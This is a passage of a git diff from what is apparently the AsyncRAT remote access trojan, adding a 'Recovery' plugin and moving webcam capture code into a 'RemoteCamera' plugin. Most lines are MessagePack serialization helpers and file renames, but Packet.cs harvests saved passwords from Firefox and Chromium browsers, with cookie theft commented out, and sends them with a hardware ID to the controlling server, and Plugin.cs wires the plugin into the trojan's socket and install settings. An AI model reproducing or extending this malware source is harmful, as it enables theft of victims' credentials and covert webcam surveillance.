+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
new file mode 100644
index 0000000..169c32b
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Packet.cs
@@ -0,0 +1,44 @@
+using Plugin.MessagePack;
+using System;
+using System.Text;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static void Read()
+ {
+ try
+ {
+ StringBuilder Credentials = new StringBuilder();
+ new Browsers.Firefox.Firefox().CredRecovery(Credentials);
+ new Browsers.Chromium.Chromium().Recovery(Credentials);
+
+ //StringBuilder Cookies = new StringBuilder();
+ //new Browsers.Firefox.Firefox().CookiesRecovery(Cookies);
+ //new Browsers.Chromium.Chromium().CookiesRecovery(Cookies);
+
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "recoveryPassword";
+ msgpack.ForcePathObject("Password").AsString = Credentials.ToString();
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
+ //msgpack.ForcePathObject("Cookies").AsString = Cookies.ToString();
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ catch (Exception ex)
+ {
+ Error(ex.Message);
+ }
+ Connection.Disconnected();
+ }
+
+ public static void Error(string ex)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Error";
+ msgpack.ForcePathObject("Error").AsString = ex;
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ }
+
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs
new file mode 100644
index 0000000..5bc9da7
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs
@@ -0,0 +1,45 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public static Mutex AppMutex;
+ public static string Mutex;
+ public static string BDOS;
+ public static string Install;
+ public static string InstallFile;
+
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ AppMutex = mutex;
+ Mutex = mtx;
+ BDOS = bdos;
+ Install = install;
+ InstallFile = installFile;
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient(msgPack);
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..53e399a
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("8bfc8ed2-71cc-49dc-9020-2c8199bc27b6")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
new file mode 100644
index 0000000..a5b3ea5
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/Recovery.csproj
@@ -0,0 +1,89 @@
+
+
+
+
+
+ Debug
+ AnyCPU
+ {8BFC8ED2-71CC-49DC-9020-2C8199BC27B6}
+ Library
+ Properties
+ Plugin
+ Recovery
+ v4.0
+ 512
+ true
+
+
+
+
+ true
+ full
+ false
+ ..\..\..\Binaries\Debug\Plugins\
+ DEBUG;TRACE
+ prompt
+ 4
+
+
+ none
+ true
+ ..\..\..\Binaries\Release\Plugins\
+ TRACE
+ prompt
+ 4
+
+
+
+ ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll
+
+
+
+ ..\packages\Newtonsoft.Json.12.0.2\lib\net40\Newtonsoft.Json.dll
+
+
+
+
+ ..\packages\System.Data.SQLite.Core.1.0.111.0\lib\net40\System.Data.SQLite.dll
+ True
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Recovery/Recovery/packages.config b/AsyncRAT-C#/Plugin/Recovery/Recovery/packages.config
new file mode 100644
index 0000000..712f46b
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Recovery/Recovery/packages.config
@@ -0,0 +1,7 @@
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera.sln b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera.sln
new file mode 100644
index 0000000..066e0c1
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RemoteCamera", "RemoteCamera\RemoteCamera.csproj", "{619B7612-DFEA-442A-A927-D997F99C497B}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {619B7612-DFEA-442A-A927-D997F99C497B}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {36226AA4-CC2B-4260-B49C-AE8C3D60BB56}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/CameraControlProperty.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/CameraControlProperty.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/CameraControlProperty.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/CameraControlProperty.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/FilterInfo.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfo.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/FilterInfo.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfo.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/FilterInfoCollection.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfoCollection.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/FilterInfoCollection.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/FilterInfoCollection.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMCameraControl.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMCameraControl.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMCameraControl.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMCameraControl.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMCrossbar.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMCrossbar.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMCrossbar.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMCrossbar.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMStreamConfig.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMStreamConfig.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMStreamConfig.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMStreamConfig.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMVideoControl.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMVideoControl.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IAMVideoControl.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IAMVideoControl.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IBaseFilter.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IBaseFilter.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IBaseFilter.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IBaseFilter.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ICaptureGraphBuilder2.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICaptureGraphBuilder2.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ICaptureGraphBuilder2.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICaptureGraphBuilder2.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ICreateDevEnum.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICreateDevEnum.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ICreateDevEnum.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ICreateDevEnum.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IEnumFilters.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumFilters.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IEnumFilters.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumFilters.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IEnumPins.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumPins.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IEnumPins.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IEnumPins.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IFilterGraph.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IFilterGraph.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IFilterGraph2.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph2.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IFilterGraph2.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IFilterGraph2.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IGraphBuilder.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IGraphBuilder.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IGraphBuilder.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IGraphBuilder.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IMediaControl.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IMediaControl.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IMediaControl.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IMediaControl.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IMediaEventEx.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IMediaEventEx.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IMediaEventEx.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IMediaEventEx.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IPin.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPin.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IPin.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPin.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IPropertyBag.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPropertyBag.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IPropertyBag.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IPropertyBag.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IReferenceClock.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IReferenceClock.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/IReferenceClock.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/IReferenceClock.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ISampleGrabber.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabber.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ISampleGrabber.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabber.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ISampleGrabberCB.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabberCB.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ISampleGrabberCB.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISampleGrabberCB.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ISpecifyPropertyPages.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISpecifyPropertyPages.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/ISpecifyPropertyPages.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/ISpecifyPropertyPages.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/Structures.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Structures.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/Structures.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Structures.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/Uuids.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Uuids.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/Uuids.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Uuids.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/Win32.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Win32.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Internals/Win32.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Internals/Win32.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/PhysicalConnectorType.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/PhysicalConnectorType.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/PhysicalConnectorType.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/PhysicalConnectorType.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/Uuids.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Uuids.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/Uuids.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/Uuids.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/VideoCapabilities.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoCapabilities.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/VideoCapabilities.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoCapabilities.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/VideoCaptureDevice.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoCaptureDevice.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/VideoCaptureDevice.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoCaptureDevice.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video.DirectShow/VideoInput.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoInput.cs
similarity index 100%
rename from AsyncRAT-C#/Client/AForge/Video.DirectShow/VideoInput.cs
rename to AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video.DirectShow/VideoInput.cs
diff --git a/AsyncRAT-C#/Client/AForge/Video/IVideoSource.cs b/AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/AForge/Video/IVideoSource.cs
similarity index 100%
